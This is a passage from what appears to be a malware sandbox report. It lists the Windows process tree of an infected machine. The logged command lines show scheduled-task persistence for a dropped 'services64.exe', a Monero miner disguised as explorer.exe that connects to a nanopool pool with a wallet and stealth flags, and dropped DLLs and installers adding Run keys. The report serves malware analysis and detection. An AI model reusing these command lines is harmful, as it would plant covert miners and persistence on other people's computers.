                                                                                                                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                              schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                                                                              PID:5268
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\services64.exe
                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                            PID:6164
                                                                                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                PID:5404
                                                                                                                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                  schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                  PID:5772
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                PID:4440
                                                                                                                                                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                  PID:4100
                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1.exe
                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\1.exe"
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                              PID:1032
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                PID:5128
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                  PID:800
                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\2.exe
                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\2.exe"
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                              PID:1424
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                PID:4976
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                  PID:3576
                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\3.exe
                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\3.exe"
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                              PID:3356
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                PID:5576
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                  PID:4112
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                              PID:1308
                                                                                                                                                                                                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                                                                                                                              PID:4660
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\dllhost.exe
                                                                                                                                                                                                                                                                              dllhost.exe
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                PID:5288
                                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                                                                                • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:2672
                                                                                                                                                                                                                                                                              • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                PID:4424
                                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:7056
                                                                                                                                                                                                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                  PID:6652
                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                                                                  PID:6748
                                                                                                                                                                                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                    PID:7108
                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                                                    PID:1216
                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                                                    PID:3920
                                                                                                                                                                                                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                                                                                                                    PID:6872
                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                                                    PID:1284
                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                                                    PID:6032
                                                                                                                                                                                                                                                                                  • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                                                                                                                    rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                    PID:4812
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                      rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                                      PID:5588
                                                                                                                                                                                                                                                                                  • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                                                    C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                    • Enumerates connected drives
                                                                                                                                                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                                                    PID:2160
                                                                                                                                                                                                                                                                                    • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                      C:\Windows\syswow64\MsiExec.exe -Embedding 5BA0B47574420876AD335C08FD7B3BA6 C
                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                                      PID:2528
                                                                                                                                                                                                                                                                                    • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                      C:\Windows\syswow64\MsiExec.exe -Embedding 99A466AF294775D82F0B4F80E3228524
                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                      • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                                      PID:2480
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                                                                                                        PID:6120
                                                                                                                                                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                                                          PID:6932
                                                                                                                                                                                                                                                                                    • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                      C:\Windows\syswow64\MsiExec.exe -Embedding FD742923070BB6F8B7560EAE0629A988 E Global\MSI0000
                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                                      PID:3568
                                                                                                                                                                                                                                                                                    • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                      C:\Windows\syswow64\MsiExec.exe -Embedding BDAB7EDFF9C9E27374AB06D41030C381 C
                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                        PID:6288
                                                                                                                                                                                                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding 844D97EEB30386F7D7DE7B2769E7BD91
                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                        • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                        PID:5400
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe
                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"
                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                        • Adds Run key to start application
                                                                                                                                                                                                                                                                                        PID:6860
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe
                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=715 -BF=715 -uncf=default
                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                          • Adds Run key to start application
                                                                                                                                                                                                                                                                                          PID:7112
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" "--MEcn9oiWFJ"
                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                                                                                                                                            PID:3760
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Roaming\Weather\Weather.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Weather\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Weather\User Data" --annotation=plat=Win64 --annotation=prod=Weather --annotation=ver=0.0.2 --initial-client-data=0x1ac,0x1a8,0x1a4,0x1d0,0x1ec,0x7ff800599ec0,0x7ff800599ed0,0x7ff800599ee0
                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                PID:1524
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Roaming\Weather\Weather.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Weather\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Weather --annotation=ver=0.0.2 --initial-client-data=0x16c,0x170,0x174,0x148,0x178,0x7ff7eefb4e60,0x7ff7eefb4e70,0x7ff7eefb4e80
                                                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                                                    PID:2840
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1588,9285517577021032642,13582200244432122180,131072 --lang=fr --service-sandbox-type=network --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3760_272516735" --mojo-platform-channel-handle=1712 /prefetch:8
                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                    PID:6504
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1588,9285517577021032642,13582200244432122180,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3760_272516735" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1628 /prefetch:2
                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                      PID:6416
                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1588,9285517577021032642,13582200244432122180,131072 --lang=fr --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3760_272516735" --mojo-platform-channel-handle=2028 /prefetch:8
                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                        PID:7164
                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Weather\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1588,9285517577021032642,13582200244432122180,131072 --lang=fr --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3760_272516735" --nwjs --extension-process --enable-auto-reload --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2528 /prefetch:1
                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                        • Checks computer location settings
                                                                                                                                                                                                                                                                                                        PID:6680
                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1588,9285517577021032642,13582200244432122180,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3760_272516735" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=1624 /prefetch:2
                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                          PID:3328
                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1588,9285517577021032642,13582200244432122180,131072 --lang=fr --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3760_272516735" --mojo-platform-channel-handle=2716 /prefetch:8
                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                            PID:6908
                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1588,9285517577021032642,13582200244432122180,131072 --lang=fr --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3760_272516735" --mojo-platform-channel-handle=3244 /prefetch:8
                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                              PID:2360
                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,9285517577021032642,13582200244432122180,131072 --lang=fr --service-sandbox-type=utility --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3760_272516735" --mojo-platform-channel-handle=2296 /prefetch:8
                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                PID:784
                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1588,9285517577021032642,13582200244432122180,131072 --lang=fr --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3760_272516735" --mojo-platform-channel-handle=2260 /prefetch:8
                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                  PID:6420
                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1588,9285517577021032642,13582200244432122180,131072 --lang=fr --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3760_272516735" --mojo-platform-channel-handle=2812 /prefetch:8
                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                    PID:7796
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_91C4.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites' -retry_count 10"
                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                                                PID:844
                                                                                                                                                                                                                                                                                                            • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                              C:\Windows\syswow64\MsiExec.exe -Embedding 576E443FF7EEB7EAA3C533CE153FA658 C
                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                PID:6048
                                                                                                                                                                                                                                                                                                              • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                C:\Windows\syswow64\MsiExec.exe -Embedding 66117067C98E0CD5CFCC1E1901231B3D
                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                                                PID:6428
                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe
                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"
                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                • Adds Run key to start application
                                                                                                                                                                                                                                                                                                                PID:5980
                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe
                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default
                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                  • Adds Run key to start application
